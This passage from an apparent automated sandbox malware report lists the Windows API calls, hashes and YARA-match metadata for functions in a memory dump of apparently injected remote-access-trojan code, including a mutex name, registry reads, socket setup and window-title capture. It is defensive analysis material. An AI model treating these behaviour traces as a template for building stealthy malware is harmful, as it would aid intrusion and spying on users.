                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                              • String ID: TUF
                                                                                                                                                              • API String ID: 1818849710-3431404234
                                                                                                                                                              • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                              • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                                              • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                              • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                                              APIs
                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3360349984-0
                                                                                                                                                              • Opcode ID: 153faa50691565e1b7e0162d62e0adc95336b7a2c72cd5f78c30f469eea54d1a
                                                                                                                                                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                                                              • Opcode Fuzzy Hash: 153faa50691565e1b7e0162d62e0adc95336b7a2c72cd5f78c30f469eea54d1a
                                                                                                                                                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3604237281-0
                                                                                                                                                              • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                              • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                                                                              • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                              • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3919263394-0
                                                                                                                                                              • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                                                              • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                                                                              • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                                                              • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountEventTick
                                                                                                                                                              • String ID: >G
                                                                                                                                                              • API String ID: 180926312-1296849874
                                                                                                                                                              • Opcode ID: 82a92c61c0475bb0149eac442826b2f03ceafa0500bc07d582349480e2afc1af
                                                                                                                                                              • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                                                                              • Opcode Fuzzy Hash: 82a92c61c0475bb0149eac442826b2f03ceafa0500bc07d582349480e2afc1af
                                                                                                                                                              • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                                                                              APIs
                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorLastMutex
                                                                                                                                                              • String ID: Rmc-GH3PRL
                                                                                                                                                              • API String ID: 1925916568-5424442
                                                                                                                                                              • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                                                                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                                                              • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                                                                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                              • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                                                              • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                                                              • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                                                              • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                              • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                                                                              • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                                                                              • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                                                                              • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                              • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                              • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                                                              • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                              • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                              • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                                              • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                                                              • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                                              • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                              • String ID: xAG
                                                                                                                                                              • API String ID: 176396367-2759412365
                                                                                                                                                              • Opcode ID: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
                                                                                                                                                              • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                                                                              • Opcode Fuzzy Hash: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
                                                                                                                                                              • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                                                              APIs
                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: GlobalMemoryStatus
                                                                                                                                                              • String ID: @
                                                                                                                                                              • API String ID: 1890195054-2766056989
                                                                                                                                                              • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                              • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                                                              • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                              • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 0044B9DF
                                                                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap$_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1482568997-0
                                                                                                                                                              • Opcode ID: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                                                                                                                                              • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                                                                              • Opcode Fuzzy Hash: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                                                                                                                                              • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                                                                              APIs
                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateEventStartupsocket
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1953588214-0
                                                                                                                                                              • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                              • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                                                              • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                              • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                                                                                • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3476068407-0
                                                                                                                                                              • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                                                                              • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                                                                              • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                                                                              • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                                                                              APIs
                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$ForegroundText
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 29597999-0
                                                                                                                                                              • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                                                                              • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                                                                              • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                                                                              • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                                                                              APIs
                                                                                                                                                              • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                                                                              • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                                                                                • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                                                • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                                • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                                • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                                • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1170566393-0
                                                                                                                                                              • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                                                                              • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                                                                              • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                                                                              • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                                                                              APIs
                                                                                                                                                              • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                              • Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                                              • Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
                                                                                                                                                              • Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                                              • Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
                                                                                                                                                              APIs
